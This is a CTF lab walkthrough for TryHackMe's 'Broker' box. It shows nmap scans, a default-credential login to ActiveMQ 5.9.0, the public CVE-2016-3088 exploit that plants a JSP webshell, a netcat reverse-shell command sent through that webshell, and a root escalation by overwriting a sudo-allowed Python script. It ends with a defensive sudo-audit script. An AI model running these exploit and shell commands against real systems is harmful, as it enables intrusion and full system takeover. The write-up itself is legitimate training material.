Broker Tryhackme Walkthrough

BROKER EASY WRITEUP

BOX DESCRIPTION:


⭐ It's rated a Medium box, but it's not a medium box 🙂 it's a very easy box 😏


⭐ User flag: outdated software CVE exploit


⭐ Root flag: misconfiguration

Enumeration:

As usual, I start with an nmap scan 😅

 Nmap 

Initial nmap scan: nmap -sV -sC <IP> -A

Result:

 PORT  STATE SERVICE REASON     VERSION  
 22/tcp open ssh   syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |  2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)  
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F  
 |  256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)  
 | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=  
 |  256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)  
 |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe  
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  

 

No port 80 or 8080.

Cool, let's run a full port scan with nmap.

I recommend a dedicated full-port scanner like Masscan or RustScan instead of nmap;

compared to nmap, their port scans are much faster.

Nmap Port Scan 

nmap -p 1000-10000 10.10.110.80 -vv 

because that range was mentioned in the room.

Result:

 PORT   STATE SERVICE   REASON  
 1883/tcp open mqtt    syn-ack  
 8161/tcp open patrol-snmp syn-ack  

Sweet... we got ports 1883 and 8161.


Port 1883 is MQTT.

Port 8161 I don't know, OK, let's enumerate it :)


PORT 8161

Main page

Yep, it's a mobile screenshot; I forgot to take pictures on my laptop and now my laptop is dead 🚶 so

Wow, it's an HTTP port!! And it also has a sign-in option.

Let's try default usernames/passwords

like admin:password 

admin:admin

ADMIN PAGE


Wow!! We are in the admin panel.


It's an ActiveMQ site. Checking the admin page properly, we get the version info.


It's ActiveMQ version 5.9.0.

It's outdated software, and there are a lot of exploits for it on GitHub and in Metasploit.

I know the Metasploit exploit did not work for me 💔

It's a pretty easy box, so we use the GitHub exploit.

I am using this exploit, it's perfect ❤️

Copy this 😁

 git clone https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088  

 

STEPS TO EXPLOIT ActiveMQ 5.9.0

 

 1) cd ActiveMQ_putshell-CVE-2016-3088  
 2) python ActiveMQ_putshell.py -u http://<$IP>:8161  
 OUTPUT:  
  ____            _      _ _   
  | _ \           | |     | || |  
  | |_) | _  _  __ _ ___ | |__  ___ | || |  
  | _ < | | | | / _` |/ __|| '_ \ / _ \| || |  
  | |_) || |_| | | (_| |\__ \| | | || __/| || |  
  |____/ \__, | \__, ||___/|_| |_| \___||_||_|  
      __/ |  __/ |              
      |___/  |___/  
 ActiveMQ_put_path:/opt/apache-activemq-5.9.0/webapps/  
 ActiveMQ_put__txt:http://10.10.110.80:8161/fileserver/guo.txt  
 ActiveMQ_putshell:http://10.10.110.80:8161/admin/guo.jsp  

 

Our webshell uploaded successfully 🙂

 

Let's check it.

Copy my command for a reverse shell.

First I tried a bash reverse shell but it did not work 😔

Hopefully the victim machine has netcat 😌

Command:

 http://<$IP>:8161/admin/guo.jsp?pwd=gshell&shell=nc%20<YOUR IP>%209001%20-e%20/bin/sh  

Be sure to update your IPs and listen on your local machine 😜


Baaaang 💨!!! Got a reverse connection.

USER FLAG

 activemq@activemq:/opt/apache-activemq-5.9.0$ ls     
 ls  
 LICENSE   activemq-all-5.9.0.jar conf   lib       subscribe.py  
 NOTICE       bin                 data   start.sh       tmp  
 README.txt chat.py            flag.txt subcribe.py webapps  
 activemq@activemq:/opt/apache-activemq-5.9.0$ cat flag.txt  
 cat flag.txt  
 THM{youXXXXXXXX}  
 activemq@activemq:/opt/apache-activemq-5.9.0$   

ROOT FLAG

Run sudo -l to check what we are allowed to run as root 🔥

 sudo -l  
 Matching Defaults entries for activemq on activemq:  
   env_reset, mail_badpass,  
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin  
 User activemq may run the following commands on activemq:  
   (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py  

Cool, we can run /opt/apache-activemq-5.9.0/subscribe.py with sudo.

Here is the payload for privilege escalation.

Copy paste 😁

 echo "import os" > subscribe.py  
 echo 'os.system("bash")' >> subscribe.py  
 sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py  

BOOOM! Haha, we are ROOT

 

 root@activemq:~# cat root.txt  
 cat root.txt  
 THM{brXXXXXXXX}  
 root@activemq:~#   
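Checking for the root-flag misconfiguration from the defender's side: an added example (not code from the original post) that parses `sudo -l` output and flags NOPASSWD rules whose command or script path, or its parent directory, the invoking user can write. The temp-directory script and the fake sudoers line it checks are constructed for the demo.

```python
"""Audit `sudo -l` output for NOPASSWD rules whose target the caller can modify (added example)."""
import os
import re
import stat
import tempfile

# One command rule from `sudo -l`, e.g. `(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>/.*)$")


def parse_sudo_l(output):
    """Return [(runas, [tags], argv)] for every command rule in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = [t for t in re.split(r":\s*", m.group("tags")) if t]
            rules.append((m.group("runas"), tags, m.group("cmd").split()))
    return rules


def writable_by(path, uid, gids):
    """True if uid/gids can write `path` or its parent directory (a writable
    parent lets the file be swapped out even when the file itself is read-only)."""
    for p in (path, os.path.dirname(path)):
        st = os.stat(p)
        if (uid == st.st_uid and st.st_mode & stat.S_IWUSR) \
                or (st.st_gid in gids and st.st_mode & stat.S_IWGRP) \
                or st.st_mode & stat.S_IWOTH:
            return True
    return False


def audit(sudo_l_output, uid, gids):
    """Flag every absolute path in a rule's argv the user can modify; the fix is a root-owned, non-writable script and directory."""
    findings = []
    for runas, tags, argv in parse_sudo_l(sudo_l_output):
        for arg in argv:
            if arg.startswith("/") and os.path.exists(arg) and writable_by(arg, uid, gids):
                findings.append((runas, tags, arg))
    return findings


def demo():
    """Constructed scenario mirroring the box: the user owns the script sudo runs.
    Returns (findings, whether a different uid could also write the script)."""
    script = os.path.join(tempfile.mkdtemp(), "subscribe.py")
    with open(script, "w") as f:
        f.write("print('subscriber')\n")  # stand-in for the real subscribe.py
    os.chmod(script, 0o644)  # owner-writable, as on the box
    fake = f"    (root) NOPASSWD: /usr/bin/python3.7 {script}\n"  # constructed sudoers line
    uid, gid = os.getuid(), os.getgid()
    return audit(fake, uid, [gid]), writable_by(script, uid + 1, [])
```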

 

 

That's it.
